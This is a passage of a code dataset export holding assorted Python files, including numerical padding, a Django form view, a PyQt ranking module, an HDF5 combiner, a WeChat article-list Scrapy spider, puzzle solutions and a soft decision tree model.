Use zero_pad instead.\n\n Note that this function uses the old padding algorithm, which\n 1) does not (quite) preserve symmetry of DFT for even nk\n 2) puts the zeros in the wrong spot altogether for odd nk...\n Besides that, it only works with real numbers...\n \"\"\"\n # zero padding for FFT interpolation in 3D\n nk1p = nfft1+nk1\n nk2p = nfft2+nk2\n nk3p = nfft3+nk3\n # first dimension\n auxp1 = np.zeros((nk1,nk2,nk3p),dtype=float)\n auxp1[:,:,:int(nk3/2)]=aux[:,:,:int(nk3/2)]\n auxp1[:,:,int(nfft3+nk3/2):]=aux[:,:,int(nk3/2):]\n # second dimension\n auxp2 = np.zeros((nk1,nk2p,nk3p),dtype=float)\n auxp2[:,:int(nk2/2),:]=auxp1[:,:int(nk2/2),:]\n auxp2[:,int(nfft2+nk2/2):,:]=auxp1[:,int(nk2/2):,:]\n # third dimension\n auxp3 = np.zeros((nk1p,nk2p,nk3p),dtype=float)\n auxp3[:int(nk1/2),:,:]=auxp2[:int(nk1/2),:,:]\n auxp3[int(nfft1+nk1/2):,:,:]=auxp2[int(nk1/2):,:,:]\n\n return(auxp3)\n","repo_name":"marcobn/PAOFLOW","sub_path":"src/defs/zero_pad.py","file_name":"zero_pad.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"11317030655","text":"import time\r\n\r\ndef riffel(lista):\r\n result = []\r\n for test in range(0, int(len(lista)/2)):\r\n result.append(lista[test])\r\n result.append(lista[int(test+len(lista)/2)])\r\n \r\n return result\r\n\r\n#lista = []\r\n#antal = int(input(\"Antal kort: \"))\r\n#for temp in range(0, antal):\r\n# lista.append(temp)\r\n\r\n#rifflad = lista\r\n#rifflad = riffel(rifflad)\r\n\r\ncount = 1\r\n\r\nfor antal in range(2, 100, 2):\r\n lista = list(range(antal))\r\n #print(lista)\r\n count = 1\r\n rifflad = riffel(lista)\r\n while rifflad != lista:\r\n count += 1\r\n rifflad = riffel(rifflad)\r\n\r\n print(antal, count)\r\n \r\n","repo_name":"maxbergmark/old-work","sub_path":"GruPDat/Laboration 4/extraextra.py","file_name":"extraextra.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10679153640","text":"\"\"\"add time range columns in tasks table\n\nRevision ID: c5521d5c2307\nRevises: 16128ba515fe\nCreate Date: 2023-01-04 08:40:34.267535\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c5521d5c2307'\ndown_revision = '16128ba515fe'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('tasks', sa.Column('time_range_start', sa.DateTime(timezone=True), nullable=True))\n op.add_column('tasks', sa.Column('time_range_end', sa.DateTime(timezone=True), nullable=True))\n op.alter_column('tasks', 'type', nullable=False)\n\n\ndef downgrade():\n op.alter_column('tasks', 'type', nullable=True)\n op.drop_column('tasks', 'time_range_end')\n op.drop_column('tasks', 'time_range_start')\n","repo_name":"automactic/InstaArchiver","sub_path":"app/alembic/versions/c5521d5c2307_add_time_range_columns_in_tasks_table.py","file_name":"c5521d5c2307_add_time_range_columns_in_tasks_table.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"34451721917","text":"from django.shortcuts import render\nfrom .forms import FeedbackForm\n\n# Create your views here.\n\ndef home_view(request):\n context = {}\n return render(request, 'index.html',context)\n\n\ndef feedback_form(request):\n form = FeedbackForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = FeedbackForm()\n context = 
{\n 'form' : form\n }\n return render(request, 'forms.html', context)\n","repo_name":"swikritiss/Feedback-Form","sub_path":"myprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"498178897","text":"from PyQt5.QtCore import QObject, pyqtSignal\n\nfrom pathlib import Path\nimport parametros as p\n\nclass LogicaRanking(QObject):\n\n senal_abrir_inicio = pyqtSignal()\n senal_lista_puntajes = pyqtSignal(list)\n\n def __init__(self):\n super().__init__()\n self.top5_puntajes = []\n\n self.crear_archivo_puntajes()\n self.lista_mejores_puntajes()\n\n #Funcion para crear puntajes.txt si no existe\n #https://appdividend.com/2021/06/03/how-to-create-file-if-not-exists-in-python/\n def crear_archivo_puntajes(self):\n existe_archivo_puntajes = Path(\"backend\", \"puntajes.txt\")\n existe_archivo_puntajes.touch(exist_ok=True)\n\n #Ordena en una lista a los cinco mejores puntajes\n def lista_mejores_puntajes(self):\n lista_puntajes = []\n\n with open(Path(\"backend\", \"puntajes.txt\"), \"r\", encoding=\"UTF-8\") as archivo:\n\n for linea in archivo.readlines():\n tupla_nombre_puntaje = tuple(linea.strip().split(\",\"))\n lista_puntajes.append(tupla_nombre_puntaje)\n\n lista_puntajes.sort(key=lambda puntaje: puntaje[1], reverse=True)\n self.top5_puntajes = lista_puntajes[:5]\n\n #Manda la senal para volver a la ventana de inicio\n def abrir_inicio(self):\n self.senal_abrir_inicio.emit()\n\n #Manda la lista de puntajes a ventana de ranking\n def mandar_puntajes(self):\n self.senal_lista_puntajes.emit(self.top5_puntajes)\n\n #Se encarga de actualizar la data de los ranking\n #cuando un jugador pierde o no quiere seguir jugando\n def actualizar_data_ranking(self, nuevo_nombre_puntaje):\n lista_puntajes = []\n with open(Path(\"backend\", \"puntajes.txt\"), \"r\", encoding=\"UTF-8\") as archivo:\n for linea in archivo.readlines():\n tupla_nombre_puntaje = tuple(linea.strip().split(\",\"))\n lista_puntajes.append(tupla_nombre_puntaje)\n\n lista_nombres = [nombre_puntaje[0] for nombre_puntaje in lista_puntajes]\n if nuevo_nombre_puntaje[0] not in lista_nombres:\n lista_puntajes.append(nuevo_nombre_puntaje)\n else:\n for index, nombre_puntaje in enumerate(lista_puntajes):\n if nuevo_nombre_puntaje[0] == nombre_puntaje[0]:\n if tupla_nombre_puntaje[1] > nombre_puntaje[1]:\n lista_puntajes[index] = nuevo_nombre_puntaje\n\n with open(Path(\"backend\", \"puntajes.txt\"), \"w\", encoding=\"UTF-8\") as archivo:\n for tupla_nombre_puntaje in lista_puntajes:\n archivo.write(f\"{tupla_nombre_puntaje[0]},{tupla_nombre_puntaje[1]}\\n\")\n\n\n\n\n\n\n\n","repo_name":"nicoabarca/progra_avanzada","sub_path":"Tareas/T2/backend/logica_ranking.py","file_name":"logica_ranking.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30204596588","text":"#!/bin/sh /cvmfs/icecube.opensciencegrid.org/py2-v3.0.1/icetray-start\n#METAPROJECT: simulation/V06-01-00-RC4\n\nimport numpy as np\nimport h5py\nimport glob\nimport argparse\nimport sys\n\ndef get_file_entries(filename):\n f = h5py.File(filename, 'r')\n return len(f[\"weights\"])\n f.close()\n del f\n\ndef check_reco(filename):\n f = h5py.File(filename, 'r')\n return (\"reco\" in f.keys())\n f.close()\n del f\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input_files\", type=str, default=None,\n dest=\"input_files\", 
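# Aside on LogicaRanking above, as a hedged sketch: the scores read back from
# puntajes.txt are strings, so sort(key=lambda p: p[1]) orders them
# lexicographically ("9" > "10"), and the update branch compares against the
# stale loop variable tupla_nombre_puntaje rather than nuevo_nombre_puntaje.
# A numeric best-score-per-name version (assumes integer scores):
def top5(pairs):  # pairs: iterable of (name, score_as_str) tuples
    best = {}
    for name, score in pairs:
        score = int(score)
        if name not in best or score > best[name]:
            best[name] = score
    return sorted(best.items(), key=lambda p: p[1], reverse=True)[:5]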
help=\"name for input files\")\nparser.add_argument(\"-o\", \"--output_file\", type=str, default=None,\n dest=\"output_file\", help=\"name for output file\")\nargs = parser.parse_args()\n\n#filenames = sorted(glob.glob(\"/mnt/scratch/priesbr1/Processed_Files/NuMu_140000_??????_level2_sim6.hdf5\"))\n#filenames = sorted(glob.glob(\"/mnt/home/f0008480/IceCUBE/Level5p_IC86.2013_genie_numu.014640.??????.hdf5\"))\n#filenames = sorted(glob.glob(\"/mnt/scratch/f0008480/Processed_Files/14640/Level5p_IC86.2013_genie_numu.014640.??????.hdf5\"))\n#filenames = sorted(glob.glob(\"/mnt/scratch/f0008480/Processed_Files/Simulation/Second_Run/NuE_120000_0000??_level2.hdf5\"))\n#filenames = ['outfile_sim_jessie_run1.hdf5', 'outfile_sim_jessie_run2.hdf5', 'outfile_sim_run2.hdf5']\n#outfilename = \"/mnt/scratch/priesbr1/Processed_Files/NuMu_level2_sim6.hdf5\"\n\nfilenames = sorted(glob.glob(args.input_files))\noutfilename = args.output_file\n\nnp.set_printoptions(threshold=sys.maxsize)\n\nreco = False\nentries_per_file = []\nfor filename in filenames:\n print(\"checking {}\".format(filename))\n entries_per_file.append(get_file_entries(filename))\n if not reco:\n reco = check_reco(filename)\ntotal_entries = sum(entries_per_file)\nprint(\"total entries: {}\".format(total_entries))\n\nf = h5py.File(outfilename, 'w')\ngrp_features = f.create_group(\"features\")\ngrp_labels = f.create_group(\"labels\")\nif reco:\n grp_reco = f.create_group(\"reco\")\n\n# create arrays from template\nf_template = h5py.File(filenames[0], 'r')\n\nlabel_keys = list(f_template[\"labels\"].keys())\nfeature_keys = list(f_template[\"features\"].keys())\nif \"reco\" in f_template:\n reco_keys = list(f_template[\"reco\"].keys())\n\nout_features = dict()\nout_labels = dict()\nif \"reco\" in f_template:\n out_reco = dict()\n\nfor k in label_keys:\n out_labels[k] = np.array([])\nfor k in feature_keys:\n out_features[k] = np.array([])\nif \"reco\" in f_template:\n for k in reco_keys:\n out_reco[k] = np.array([])\nout_weights = np.array([])\n\nf_template.close()\ndel f_template\n\n# get minimum number of entries in files\nmin_entries = min(entries_per_file)\nprint(\"Minimum number of entries in all files:\", min_entries)\n\n# read data from input files\ncurrent_entry = 0\nfile_energies = []\nfile_cascades = []\nfile_time_lists = []\nfor filename in filenames:\n f_input = h5py.File(filename, 'r')\n entries = len(f_input[\"weights\"])\n\n if entries == 0:\n continue\n\n # generate random numbers for checking\n save_length = np.random.randint(5,20)\n save_index = np.random.randint(0,min_entries-(save_length+1))\n\n print(\"reading input file {} with {} entries\".format(filename, entries))\n\n out_weights = np.concatenate((out_weights, f_input[\"weights\"][:]))\n for k in label_keys:\n out_labels[k] = np.concatenate((out_labels[k], f_input[\"labels\"][k][:]))\n for k in feature_keys:\n out_features[k] = np.concatenate((out_features[k], f_input[\"features\"][k][:]))\n if \"reco\" in f_input:\n for k in reco_keys:\n out_reco[k] = np.concatenate((out_reco[k], f_input[\"reco\"][k][:]))\n\n test_energies = np.array(f_input[\"labels\"][\"energy\"][save_index:save_index+save_length])\n file_energies.append(test_energies)\n test_cascades = np.array(f_input[\"labels\"][\"isCascade\"][save_index:save_index+save_length])\n file_cascades.append(test_cascades)\n test_times = np.array(f_input[\"features\"][\"pulse_time\"][save_index])\n file_time_lists.append(test_times)\n \n f_input.close()\n del f_input\n\n current_entry += entries\n\nif current_entry != 
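# Aside on the accumulation loop above: calling np.concatenate once per file
# re-copies everything read so far (quadratic); gathering chunks in a list and
# concatenating once is equivalent and linear. Ragged per-event arrays such as
# pulse_time are written with a variable-length dtype, as the script does
# further down. Hedged sketch:
import h5py
import numpy as np

def combine_weights(filenames):
    chunks = []
    for fname in filenames:
        with h5py.File(fname, "r") as fin:
            chunks.append(fin["weights"][:])
    return np.concatenate(chunks)

def write_ragged(fout, name, arrays):
    dt = h5py.special_dtype(vlen=arrays[0].dtype)
    dset = fout.create_dataset(name, (len(arrays),), dtype=dt)
    for i, arr in enumerate(arrays):
        dset[i] = arr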
len(out_weights):\n raise RuntimeError(\"Unexpected number of events -- got %i, expected %i\"%(current_entry, len(out_weights)))\n\nfor k in label_keys:\n grp_labels.create_dataset(k, data=out_labels[k])\nprint(\"Finished creating labels\")\nfor k in feature_keys:\n dt = h5py.special_dtype(vlen=out_features[k][0].dtype)\n dset = grp_features.create_dataset(k, (len(out_features[k]), ), dtype=dt)\n for i in range(len(out_features[k])):\n dset[i] = out_features[k][i]\nprint(\"Finished creating features\")\nif reco:\n for k in reco_keys:\n grp_reco.create_dataset(k, data=out_reco[k])\nprint(\"Finished creating reco\")\ngrp_weights = f.create_dataset(\"weights\", data=out_weights)\nprint(\"Finished creating weights\")\n\nf.close()\nprint(' ')\n\n# check for concatenation errors\ndef isSubArray(long_array, short_array):\n i = 0\n j = 0\n m = len(long_array)\n n = len(short_array)\n\n max_match = 0\n match = 0\n\n if type(long_array[0]) != np.ndarray:\n while i < m and j < n:\n if long_array[i] == short_array[j]:\n i += 1\n j += 1\n match += 1\n if match > max_match:\n max_match = int(match)\n\n if j == n:\n return True\n\n else:\n i = i - j + 1\n j = 0\n match = 0\n\n if i == m:\n print(\"Longest match:\", max_match)\n return False\n\n else:\n done_return = False\n for k, sub_array in enumerate(long_array):\n p = len(sub_array)\n while i < p and j < n:\n if sub_array[i] == short_array[j]:\n i += 1\n j += 1\n match += 1\n if match > max_match:\n max_match = int(match)\n\n if j == n:\n done_return = True\n return True\n\n else:\n if match > 0:\n print(match)\n i = 0\n j = 0\n match = 0\n break \n \n if not done_return:\n print(\"Longest match:\", max_match)\n return False\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n f_input = h5py.File(filename, 'r')\n energies = f_input[\"labels\"][\"energy\"][:]\n bool_array.append(isSubArray(energies, file_energies[i]))\n f_input.close()\n del f_input\n\nfor i in range(len(bool_array)):\n print(\"Kept regression labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Regression label information not kept from all files\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n f_input = h5py.File(filename, 'r')\n cascades = f_input[\"labels\"][\"isCascade\"][:]\n bool_array.append(isSubArray(cascades, file_cascades[i]))\n f_input.close()\n del f_input\n\nfor i in range(len(bool_array)):\n print(\"Kept classification labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Classification label information not kept from all files\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n f_input = h5py.File(filename, 'r')\n time_lists = f_input[\"features\"][\"pulse_time\"][:]\n bool_array.append(isSubArray(time_lists, file_time_lists[i]))\n f_input.close()\n del f_input\n\nfor i in range(len(bool_array)):\n print(\"Kept features from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Feature information not kept from all files\")\n\nf = h5py.File(outfilename, \"r\")\nprint(f.keys())\nout_energies = f[\"labels\"][\"energy\"][:]\nout_cascades = f[\"labels\"][\"isCascade\"][:]\nout_time_lists = f[\"features\"][\"pulse_time\"][:]\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n bool_array.append(isSubArray(out_energies, file_energies[i]))\nfor i in range(len(bool_array)):\n print(\"Found outfile regression labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise 
RuntimeError(\"Regression label information not found in outfile\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n bool_array.append(isSubArray(out_cascades, file_cascades[i]))\nfor i in range(len(bool_array)):\n print(\"Found outfile classification labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Classification label information not found in outfile\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n bool_array.append(isSubArray(out_time_lists, file_time_lists[i]))\nfor i in range(len(bool_array)):\n print(\"Found outfile features from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Feature information not found in outfile\")\n\nf.close()\ndel f\n","repo_name":"priesbr1/Upgrade_RNN","sub_path":"combine_hdf5.py","file_name":"combine_hdf5.py","file_ext":"py","file_size_in_byte":8964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14098557896","text":"class Solution(object):\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n \n min_len = len(strs[0])\n if len(strs)==0 :\n return \"\";\n \n if len(strs)!=0:\n for i in range (1,len(strs)):\n min_len = min(min_len,len(strs[i]))\n # return min_len\n \n prefix = \"\"\n \n for i in range (0, min_len):\n for j in range (1, len(strs)):\n if strs[0][i]!=strs[j][i]:\n return prefix\n # break\n prefix +=strs[0][i] \n \n return prefix\n\n ","repo_name":"wooddada/LeetCode","sub_path":"0014-longest-common-prefix/0014-longest-common-prefix.py","file_name":"0014-longest-common-prefix.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16807960804","text":"import scrapy\nfrom scrapy.http import Request\nfrom crawler.crawler.utils import get_global_settings\nfrom crawler.crawler.items.load_more import LoadMoreItem\nfrom crawler_assist.tidy_req_data import TidyReqData\nfrom ui import gc\n\n\nclass ArticleListSpider(scrapy.Spider):\n name = 'article_list'\n allowed_domains = ['mp.weixin.qq.com']\n start_url = []\n custom_settings = get_global_settings()\n wx_num,_,_ = TidyReqData.get_gzh_req_data()\n if wx_num == 0:\n wx_num = 1\n custom_settings['DOWNLOAD_DELAY'] = round(2.0/wx_num,2)\n custom_settings['ITEM_PIPELINES'] = {\n 'crawler.crawler.pipelines.load_more.ResponseArticleListPipeline': 300,\n }\n custom_settings['DOWNLOADER_MIDDLEWARES'] = {\n 'crawler.crawler.middlewares.load_more.LoadMoreMiddleware': 543,\n }\n counter = 0\n list_offset = 0\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n :param args:\n :param kwargs:\n 实例化爬虫需要调用的函数\n \"\"\"\n self.current_nickname = ''\n\n def start_requests(self):\n \"\"\"\n :return:重新爬虫的入口函数, 否者直接请求start_urls中的各个url\n 重写之后手动调用Request并指定回调函数例如self.parse\n \"\"\"\n yield Request(url='http://www.aii.com',\n meta={\"list_offset\":self.list_offset} ,\n callback=self.parse, dont_filter=True)\n\n def parse(self, response):\n \"\"\"\n :param response:\n :return:请求完成之后的回调函数\n \"\"\"\n self.counter += 1\n cmc = response.get_ext_data['can_msg_continue']\n next_offset = response.get_ext_data['next_offset']\n item = LoadMoreItem()\n item['article_list'] = response.get_ext_data['data']\n item['nickname'] = response.get_ext_data['nickname']\n self.current_nickname = response.get_ext_data['nickname']\n gc.report_crawling({'nickname':item['nickname'],\n 'percent':'UNK',\n 'more':cmc,\n 
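# Aside on the longestCommonPrefix solution above: it indexes strs[0] before the
# len(strs)==0 guard, so an empty list raises IndexError. An equivalent
# zip-based version that checks the empty case first (hedged sketch):
def longest_common_prefix(strs):
    if not strs:
        return ""
    prefix = []
    for chars in zip(*strs):  # zip stops at the shortest string
        if len(set(chars)) != 1:
            break
        prefix.append(chars[0])
    return "".join(prefix)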
'title':len(item['article_list'])})\n yield item\n if cmc == 1:\n yield Request(url='http://www.aii.com',\n meta={\"list_offset\":next_offset} ,\n callback=self.parse, dont_filter=True)\n\n def close(self, reason):\n \"\"\"\n :param reason:\n :return:所有url请求完毕之后关闭爬虫的回调函数\n \"\"\"\n # 删除被删除的公众号 被删除的公众号content_url为空\n from db import delete\n delete(self.current_nickname, content_url=\"\")\n print(self.name,\"爬虫关闭\")\n","repo_name":"54xingzhe/weixin_crawler","sub_path":"project/crawler/crawler/spiders/article_list.py","file_name":"article_list.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":416,"dataset":"github-code","pt":"61"} +{"seq_id":"23110953606","text":"import unittest\r\n\r\n\r\ndef validate_battlefield(battlefield):\r\n poss = [[], [], [], []] # first contains possible 1 positions, second 2 positions, third 3 , fourth 4 positions\r\n points = set()\r\n for i in range(10):\r\n for j in range(10):\r\n if battlefield[i][j] == 1:\r\n points.add((i, j))\r\n poss[0].append((i, j))\r\n\r\n # find vertical length\r\n v = 1\r\n while v < 4 and i + v < 10:\r\n if battlefield[i + v][j] == 1:\r\n poss[v].append([(k, j) for k in range(i, i+v+1)])\r\n else: break\r\n v += 1\r\n\r\n # find horizontal length\r\n h = 1\r\n while h < 4 and j + h < 10:\r\n if battlefield[i][j + h] == 1:\r\n poss[h].append([(i, k) for k in range(j, j+h+1)])\r\n else: break\r\n h += 1\r\n\r\n # quick false checks\r\n if len(points) != 20: return False\r\n if not all(ship_group for ship_group in poss): return False\r\n\r\n # test for possible\r\n return scan_possible(set(), 3, 1, 0, poss)\r\n\r\n\r\ndef scan_possible(visited, ship_type, ship_num, start, poss):\r\n for b in range(start, len(poss[ship_type])):\r\n if ship_type == 3:\r\n result = scan_possible(set(poss[ship_type][b]), 2, 1, 0, poss)\r\n if result: return result\r\n elif all(c not in visited for c in poss[ship_type][b]):\r\n if ship_type == 0 and ship_num == 4:\r\n return True\r\n elif ship_type == 1 and ship_num == 3:\r\n if scan_possible(visited.union(poss[ship_type][b]), 0, 1, 0, poss): return True\r\n elif ship_type == 2 and ship_num == 2:\r\n if scan_possible(visited.union(poss[ship_type][b]), 1, 1, 0, poss): return True\r\n else:\r\n if scan_possible(visited.union(poss[ship_type][b]), ship_type, ship_num+1, b+1, poss): return True\r\n return False\r\n\r\n\r\nclass Tests(unittest.TestCase):\r\n def test_battlefield(self):\r\n self.assertEqual(True, validate_battlefield(\r\n [[1, 0, 0, 0, 0, 1, 1, 0, 0, 0],\r\n [1, 0, 1, 0, 0, 0, 0, 0, 1, 0],\r\n [1, 0, 1, 0, 1, 1, 1, 0, 1, 0],\r\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\r\n [0, 0, 0, 0, 1, 1, 1, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\r\n [0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"HoggTruman/Code-Wars","sub_path":"3 kyu/Battleship Field Validator II.py","file_name":"Battleship Field Validator II.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37247234474","text":"### ENUNCIADO PARA EJECUTAR PROGRAMA\n''' Mi amigo Jorge desea realizar una fiesta vip; pero el año anterior una persona se coló \nutilizando el mismo nombre de otra. Y por eso Jorgue decidió este año que el portero pidiera \nnúmero de documento. 
Pero es muy difícil para este hombre estar comprobando uno por uno los \nnúmeros, entonces entramos nosotros a hacer la magia del programador!!\n\nMensaje del pedido de Jorge!\n\nEl programa deberá permitirle al portero ingresar el número de documento de quien intente entrar\n y comprobar si existe en su lista, y una vez que se le dio un PERMITIDO ENTRAR debe mostrar cuántas \n personas restan entrar. Si la persona no está en la lista debe informar a seguridad!\n \n'''\n\n\ntotalInvitados=0\nresultado=0\n\nListaInvitados={\n \"Manuel\": 101,\n \"Josefina\":102,\n \"Tomas\":103,\n \"Jean Carlo\":104,\n \"Sharon\":105,\n \"Shantal\":106,\n \"Karina\":107,\n \"Samuel\":108,\n \"Jose\":109,\n \"Tito\":110,\n \"Carlos\":111,\n \"Andrea\":112,\n \"Sabrina\":113,\n \"Antonella\":114\n }\n\nfor x in ListaInvitados:\n resultado+=1\n\nrevisionDePersona=\"Manuel\"\n\nif revisionDePersona in ListaInvitados:\n print(\"Bienvenidos a la Fiesta de Jorge\")\n resultado-=1\n print(\"Restan: \", resultado, \" invitados para entrar llegar a la fiesta\")\nelse:\n print(\"Usted no se Encuentra en la Lista de Invitados\") \n print(\"Restan por Ingresar a la Fiesta: \", resultado)","repo_name":"jcmloiacono/Python3-Personal","sub_path":"Practicas Graficas/Graficas/Examen.py","file_name":"Examen.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42220813198","text":"fh = open('mbox-short.txt')\ncount = 0\nfor line in fh:\n line=line.rstrip()\n f=line.split()\n if len(f)<3:\n continue\n if f[0] != 'From':\n continue\n print(f[1])\n count=count+1\n\n\nprint(\"There were\", count, \"lines in the file with From as the first word\")\n","repo_name":"Khatri09/myPythonJourney","sub_path":"python/count_specificWordIn_a_line.py","file_name":"count_specificWordIn_a_line.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21772051834","text":"# -*- encoding: utf-8 -*-\n'''\nGiven a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the two partitions.\n\nFor example,\nGiven 1->4->3->2->5->2 and x = 3,\nreturn 1->2->2->4->3->5.\n'''\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n \n q1 = ListNode(None)\n q2 = ListNode(None)\n h1, h2 = q1, q2\n\n p = head\n while p != None:\n if p.val < x:\n q1.next = ListNode(p.val)\n q1 = q1.next\n else:\n q2.next = ListNode(p.val)\n q2 = q2.next\n\n p = p.next\n\n q1.next = h2.next\n\n return h1.next\n\n\n\n\n\n","repo_name":"weixsong/algorithm","sub_path":"leetcode/86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24584530226","text":"# -*- coding: utf-8 -*-\n'''' Soft Decision Tree '''\nimport torch\nimport torch.nn as nn\nfrom collections import OrderedDict\n\n\nclass SDT(nn.Module):\n \"\"\" Soft Desicion Tree \"\"\"\n def __init__(self, args):\n super(SDT, self).__init__()\n self.args = args\n self.device = torch.device('cuda' if self.args['cuda'] else 'cpu')\n self.inner_node_num = 2 ** 
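# Quick check of the partition() solution above against its own docstring
# example (assumes the LeetCode ListNode sketched in the record's comment):
class ListNode(object):
    def __init__(self, x):
        self.val = x
        self.next = None

def from_list(vals):
    head = cur = ListNode(None)
    for v in vals:
        cur.next = ListNode(v)
        cur = cur.next
    return head.next

def to_list(node):
    out = []
    while node:
        out.append(node.val)
        node = node.next
    return out
# to_list(Solution().partition(from_list([1, 4, 3, 2, 5, 2]), 3)) -> [1, 2, 2, 4, 3, 5]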
self.args['depth'] - 1\n self.leaf_num = 2 ** self.args['depth']\n self.max_depth = self.args['depth']\n self.max_leaf_idx=None # the leaf index with maximal path probability\n \n # Different penalty coefficients for nodes in different layer\n self.penalty_list = [args['lamda'] * (2 ** (-depth)) for depth in range(0, self.args['depth'])] \n \n # inner nodes operation\n # Initialize inner nodes and leaf nodes (input dimension on innner nodes is added by 1, serving as bias)\n self.linear = nn.Linear(self.args['input_dim']+1, self.inner_node_num, bias=False)\n self.sigmoid = nn.Sigmoid()\n # temperature term\n if self.args['beta']:\n beta = torch.randn(self.inner_node_num)\n self.beta = nn.Parameter(beta)\n else:\n self.beta = torch.ones(1).to(self.device) # or use one beta across all nodes\n\n # leaf nodes operation\n # p*softmax(Q) instead of softmax(p*Q)\n param = torch.randn(self.leaf_num, self.args['output_dim'])\n self.param = nn.Parameter(param)\n self.softmax = nn.Softmax(dim=1)\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=self.args['lr'], weight_decay=self.args['weight_decay'])\n self.scheduler = torch.optim.lr_scheduler.ExponentialLR(self.optimizer, gamma=self.args['exp_scheduler_gamma'])\n\n def leaf_nodes(self, p):\n distribution_per_leaf = self.softmax(self.param)\n average_distribution = torch.mm(p, distribution_per_leaf)\n return average_distribution\n\n def inner_nodes(self, x):\n output = self.sigmoid(self.beta*self.linear(x))\n return output\n\n def get_tree_weights(self, Bias=False):\n \"\"\"Return tree weights as a list\"\"\"\n if Bias:\n return self.state_dict()['linear.weight'].detach().cpu().numpy() \n else: # no bias\n return self.state_dict()['linear.weight'][:, 1:].detach().cpu().numpy()\n\n\n def forward(self, data, LogProb=True):\n _mu, _penalty = self._forward(data)\n output = self.leaf_nodes(_mu) # average over leaves\n\n if self.args['greatest_path_probability']:\n one_hot_path_probability = torch.zeros(_mu.shape).to(self.device)\n vs, ids = torch.max(_mu, 1) # ids is the leaf index with maximal path probability\n one_hot_path_probability.scatter_(1, ids.view(-1,1), 1.)\n \n prediction = self.leaf_nodes(one_hot_path_probability)\n self.max_leaf_idx = ids\n\n else: # prediction value equals to the average distribution\n prediction = output\n\n if LogProb:\n output = torch.log(output)\n prediction = torch.log(prediction)\n\n weights = self.get_tree_weights(Bias=True)\n\n return prediction, output, _penalty, weights\n \n \"\"\" Core implementation on data forwarding in SDT \"\"\"\n def _forward(self, data):\n batch_size = data.size()[0]\n data = self._data_augment_(data)\n path_prob = self.inner_nodes(data)\n path_prob = torch.unsqueeze(path_prob, dim=2)\n path_prob = torch.cat((path_prob, 1-path_prob), dim=2)\n _mu = data.data.new(batch_size,1,1).fill_(1.)\n _penalty = torch.tensor(0.).to(self.device)\n \n begin_idx = 0\n end_idx = 1\n \n for layer_idx in range(0, self.args['depth']):\n _path_prob = path_prob[:, begin_idx:end_idx, :]\n _penalty= _penalty + self._cal_penalty(layer_idx, _mu, _path_prob) # extract inner nodes in current layer to calculate regularization term\n _mu = _mu.view(batch_size, -1, 1).repeat(1, 1, 2)\n _mu = _mu * _path_prob\n begin_idx = end_idx # index for each layer\n end_idx = begin_idx + 2 ** (layer_idx+1)\n mu = _mu.view(batch_size, 